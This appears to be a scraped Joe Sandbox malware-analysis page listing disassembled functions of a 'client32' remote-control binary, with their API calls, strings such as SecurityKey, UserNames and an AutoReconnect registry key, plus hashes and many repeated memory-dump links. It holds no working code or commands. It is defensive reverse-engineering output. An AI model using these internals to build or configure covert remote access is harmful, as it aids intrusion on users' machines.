Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: *channel$CLIENT32.CPP$Client$Eval$IsA()$SetChannel(%s), oldchan=<%s>$_License$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$gMain.cfg == m_cfg$licensee
API String ID: 3472027048-3511930441
Opcode ID: 1bc0b179d2efebd3b6360880317baa5e919e640bbffe5ee77faf401ffd3399d7
Instruction ID: 4d6f59fa27967af7cb4369fcdfea8b63f9a66c189d59db9a75944a8f7c73a5dd
Opcode Fuzzy Hash: 1bc0b179d2efebd3b6360880317baa5e919e640bbffe5ee77faf401ffd3399d7
Instruction Fuzzy Hash: 98717C38E00A06ABDB15DB95DC94FEEF775AF58708F508158E92177284DB70B904CBA1

Function 1103F6A0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 1103F6DB

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

SendMessageTimeoutA.USER32(?,0000004A,00010486,?,00000002,00002710,?), ref: 1103F8D0
_free.LIBCMT ref: 1103F8D7

Strings

SendJournalStatustoSTUI(%d, %d, %d, %d), xrefs: 1103F80E
Client, xrefs: 1103F701
e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h, xrefs: 1103F832, 1103F85E, 1103F899
DisableJournalMenu, xrefs: 1103F6FC
Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d, xrefs: 1103F749
IsA(), xrefs: 1103F837, 1103F863, 1103F89E

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSendTimeoutWindow__wcstoi64_free
String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
API String ID: 1897251511-2508660115
Opcode ID: 1adf17677d0cb041558a2572af771566021c8e11118b7e8d3e888507e04bca99
Instruction ID: 827cfc1f1525e0ea87e5696f209e03d9d07e61312e1a283cfb6df0a13a30b974
Opcode Fuzzy Hash: 1adf17677d0cb041558a2572af771566021c8e11118b7e8d3e888507e04bca99
Instruction Fuzzy Hash: 5171AF75E10116AFCB05DF95CC80EEEF7B5BF88309F00426DE955A7284E731A905CBA2

Function 11037540 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 197COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11037585
_strncpy.LIBCMT ref: 110376F1

Strings

Client, xrefs: 11037601
SecurityKey2, xrefs: 1103762F
SecurityKey, xrefs: 11037619
UseNTSecurity, xrefs: 1103765B
ValidAddresses., xrefs: 11037673
UserNames, xrefs: 11037645

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset_strncpy
String ID: Client$SecurityKey$SecurityKey2$UseNTSecurity$UserNames$ValidAddresses.
API String ID: 3140232205-3449891838
Opcode ID: 62deb9adcbac1e4393b73aed918802a99b2de4baabbcc0decb6c202aa1899be6
Instruction ID: 08675ffc2996a9994ec77ae635d004e2547b145dc9a4bb826478d0f5d07006d3
Opcode Fuzzy Hash: 62deb9adcbac1e4393b73aed918802a99b2de4baabbcc0decb6c202aa1899be6
Instruction Fuzzy Hash: 4461D97590061B9FD711CF28DD94FDAB7A8AF95308F0481D4E99997241EB70FA48CBD0

Function 11055550 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 172synchronizationtimeCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,2F623E72,?,?), ref: 11055599
EnterCriticalSection.KERNEL32(?,?,?), ref: 11055620
timeGetTime.WINMM(?,?), ref: 1105564C
LeaveCriticalSection.KERNEL32(?,?,?), ref: 110556FA
EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 11055714
LeaveCriticalSection.KERNEL32(?,?,?), ref: 11055739

Strings

_License, xrefs: 110556B8
maxslaves, xrefs: 110556B3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ObjectSingleTimeWaittime
String ID: _License$maxslaves
API String ID: 2566820294-253336860
Opcode ID: 85b39d58914408d7a163e2829e83e83e104effb36fc5577ab1e2f1b96c7350b9
Instruction ID: 48dbc85ab943934b8a84466f30def54263bd35f2e1c3ca06f7287a6687e73580
Opcode Fuzzy Hash: 85b39d58914408d7a163e2829e83e83e104effb36fc5577ab1e2f1b96c7350b9
Instruction Fuzzy Hash: 18619E75E01656DFDBC1CFA5D8C4B5AB7B8FB48708F0445A9E815D7244EB31A800CBA0

Function 1100B740 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON

Download Yara Rule

APIs

GetOverlappedResult.KERNEL32(?,2F623C32,FFFFFFFF,00000001), ref: 1100B78C
GetLastError.KERNEL32 ref: 1100B796
GetTickCount.KERNEL32 ref: 1100B7F9
wsprintfA.USER32 ref: 1100B836
ResetEvent.KERNEL32(?), ref: 1100B8EF

Strings

Hook_bits_per_sample, xrefs: 1100B8AB
Hook_channels, xrefs: 1100B88B
New hooked channels,bitspersample=%d,%d (old %d,%d), xrefs: 1100B874, 1100B8D7
Audio, xrefs: 1100B890, 1100B8B0

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
API String ID: 3598861413-432254317
Opcode ID: 5a65eb48652872d5814f4f76bc611f026241ddcf49cf48a664d38855d5c02a46
Instruction ID: db9b1c3ef7ce759150f8a04d918defbb80db3967ff41a2750ff19611511fa969
Opcode Fuzzy Hash: 5a65eb48652872d5814f4f76bc611f026241ddcf49cf48a664d38855d5c02a46
Instruction Fuzzy Hash: 965107B9D00A06ABE710DF64CC84ABBB7F8FF45318F448119F56A92281E734B940C765

Function 110252E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11025323

Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E

Part of subcall function 110EAB20: LoadLibraryA.KERNEL32(Kernel32.dll,2F623E72,00000002,00000000,00000000), ref: 110EAB5F
Part of subcall function 110EAB20: GetCurrentProcessId.KERNEL32 ref: 110EABAA
Part of subcall function 110EAB20: GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110EABB7
Part of subcall function 110EAB20: FreeLibrary.KERNEL32(?), ref: 110EAC54

wsprintfA.USER32 ref: 11025359
wsprintfA.USER32 ref: 110253C5
wsprintfA.USER32 ref: 110253FD

Strings

tracefile, xrefs: 110253DF
TraceModuleName, xrefs: 110252FF
_Debug, xrefs: 1102543B
trace, xrefs: 110253A6
%d.exe, xrefs: 11025352

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$Library$AddressCurrentFileFreeLoadModuleNameProcProcess_strrchr
String ID: %d.exe$TraceModuleName$_Debug$trace$tracefile
API String ID: 3659486034-589725905
Opcode ID: a7275773bff2871041cdee74396cf3c916417c8c27af77f7b489e8b866625208
Instruction ID: 1d59da684ea919fcfefad1fdef7527821daba306a369c67dcb23b03b15758af2
Opcode Fuzzy Hash: a7275773bff2871041cdee74396cf3c916417c8c27af77f7b489e8b866625208
Instruction Fuzzy Hash: 57410A35F0011A9BCB01DF659C44AFEF3A8DF8921DF5481A9ED8AD7241EE619944CBD0

Function 11055110 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,2F623E72,00000000,00000000,759223A0,110553B7,00000000,00000000), ref: 11055168
LeaveCriticalSection.KERNEL32(?), ref: 1105528A

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 1105521D
RegDeleteValueA.ADVAPI32(?,?), ref: 1105523D
RegCloseKey.ADVAPI32(?), ref: 11055247
SetEvent.KERNEL32(?), ref: 11055280

Strings

gMain.pReconnThread, xrefs: 11055151
CltReconn.cpp, xrefs: 1105514C
SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 110551DC, 11055211

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
API String ID: 1302350719-2578778249
Opcode ID: 1ed26ea936be5e88d747cbffeef235a5e33d6034bfc5ea2ba229771a93fa66eb
Instruction ID: ce719fab2f9905b832c3f41bb8e1db8fccc4b13b2a84366b11d07be144a05397
Opcode Fuzzy Hash: 1ed26ea936be5e88d747cbffeef235a5e33d6034bfc5ea2ba229771a93fa66eb
Instruction Fuzzy Hash: 4141E476E00615AFDB81CFA4CCC0A9EBBA5FB46754F148269FD15DB240E736E901CB90

Function 11103160 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111synchronizationCOMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(75A77AB0,2F623E72,?,75A77AA0,00000000,?,00000000,1116FF88,000000FF,?,110B7556), ref: 111031AA
EnterCriticalSection.KERNEL32 ref: 111031F5
SetEvent.KERNEL32(00000248), ref: 1110321E
CloseHandle.KERNEL32(00000248), ref: 11103252
WaitForSingleObject.KERNEL32(00000290,000000FF), ref: 11103260
CloseHandle.KERNEL32(00000290), ref: 1110326D
LeaveCriticalSection.KERNEL32(111DC080), ref: 111032AE

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

..\ctl32\Refcount.cpp, xrefs: 11103194
idata->Q.size () == 0, xrefs: 11103199

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterErrorEventExitLastLeaveMessageObjectProcessSingleWaitwsprintf
String ID: ..\ctl32\Refcount.cpp$idata->Q.size () == 0
API String ID: 3524385308-424854974
Opcode ID: bd65ad0157e7c5f0c241708b226ef3e10c76f8ac0d767ff1d6be5bb52270b901
Instruction ID: 5537e226c3ed29ed2631099e1c940a9c2653324e19426985809a76b96a39e417
Opcode Fuzzy Hash: bd65ad0157e7c5f0c241708b226ef3e10c76f8ac0d767ff1d6be5bb52270b901
Instruction Fuzzy Hash: E8419179D156219FCB44DFA5D8C8A5BF7A4FB0B318B148A7DE82693744D730B400CBA0

Function 1103F900 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 108librarythreadCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000080), ref: 1103F947
GetWindowThreadProcessId.USER32(?,?), ref: 1103F979
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 1103F994
LoadLibraryA.KERNEL32(psapi.dll), ref: 1103F9A9

Part of subcall function 11024B50: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11024B66
Part of subcall function 11024B50: K32GetProcessImageFileNameA.KERNEL32(?,?,?,110FA74F,00000000,00000000,?,110F9A67,00000000,?,00000104), ref: 11024B82
Part of subcall function 11024B50: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11024B96

CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 1103FA3D
FreeLibrary.KERNEL32(?), ref: 1103FA4E

Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E

Strings

NSSWControl32, xrefs: 1103F953
pcinssui.exe, xrefs: 1103FA19
psapi.dll, xrefs: 1103F9A4

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
String ID: NSSWControl32$pcinssui.exe$psapi.dll
API String ID: 2388757878-1455766584
Opcode ID: 18277493d346d02b3d74a3013f2c00a8bee2c47fbd8934cc9d4c057ad77c8781
Instruction ID: dfbeba28cc1295becff0683e474b6f47562f2fc97804bff74a571f67cadc7c7b
Opcode Fuzzy Hash: 18277493d346d02b3d74a3013f2c00a8bee2c47fbd8934cc9d4c057ad77c8781
Instruction Fuzzy Hash: 2A412BB5E002699FEB10CF55CC94BEAF7B8FB49305F4045ADE959A3240E7309A848F51

Function 110AF900 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,110B1515), ref: 110AF920
_memset.LIBCMT ref: 110AF930
GetMenuItemCount.USER32(00000000), ref: 110AF951
SetMenuItemInfoA.USER32(00000000,00000000,00000001,00000030), ref: 110AF968
GetWindowLongA.USER32(00000000,000000F0), ref: 110AF9AF
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 110AF9EF
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000277,?,00000001,00000002), ref: 110AFA25

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110AF997, 110AF9D6, 110AFA00
m_hWnd, xrefs: 110AF99C, 110AF9DB, 110AFA05

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MenuWindow$ItemLong$CountInfoSystem_memset
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2199842577-1557312927
Opcode ID: b04b959b13f10d99ed64175bab8db38eb8deeaf7e1defc8ad42111e9921e8f1e
Instruction ID: ddb40d1ec8aed4601ea5e3b2535bcba30f7b29d5a174f16626b0f8f7cf3d05c9
Opcode Fuzzy Hash: b04b959b13f10d99ed64175bab8db38eb8deeaf7e1defc8ad42111e9921e8f1e
Instruction Fuzzy Hash: 6C318071E00225BBD715DFB1DC49BDDFBB8BB04758F108669F914A61C0D7B4A640CBA1

Function 110AB7F0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,2F623E72,?,?,00000000), ref: 110AB834
EnumWindows.USER32(110AA9F0,?), ref: 110AB897
GetRgnBox.GDI32(?,?), ref: 110AB8B5
GdiFlush.GDI32 ref: 110AB8CD
DeleteObject.GDI32(?), ref: 110AB8DB
FreeLibrary.KERNEL32(?), ref: 110AB8F0

Strings

Client, xrefs: 110AB87B
IgnoreScrapeApps, xrefs: 110AB876
psapi.dll, xrefs: 110AB82F

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$DeleteEnumFlushFreeLoadObjectWindows
String ID: Client$IgnoreScrapeApps$psapi.dll
API String ID: 2450096840-2589157395
Opcode ID: 75bedf2fc8f724d347e8135fc49e05a308359e9aee003c88a1db692aba27b468
Instruction ID: bca5b5664efed83dbd9da041e75816698c7097caf9201845a9eb86541f09eb4f
Opcode Fuzzy Hash: 75bedf2fc8f724d347e8135fc49e05a308359e9aee003c88a1db692aba27b468
Instruction Fuzzy Hash: 1941C2B6D006599FCB10CFE9D884ADEFBB8FB09314F60866AE419A7240D730A944CF60

Function 11009480 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 92fileCOMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 110094BA
_strncmp.LIBCMT ref: 110094CA
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,2F623E72), ref: 1100956B

Strings

http://, xrefs: 110094B5, 110094C8
r>b/, xrefs: 110094DB, 110094EE, 11009503, 1100950B, 11009532, 1100953A, 11009571, 110094F6
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11009520, 11009548
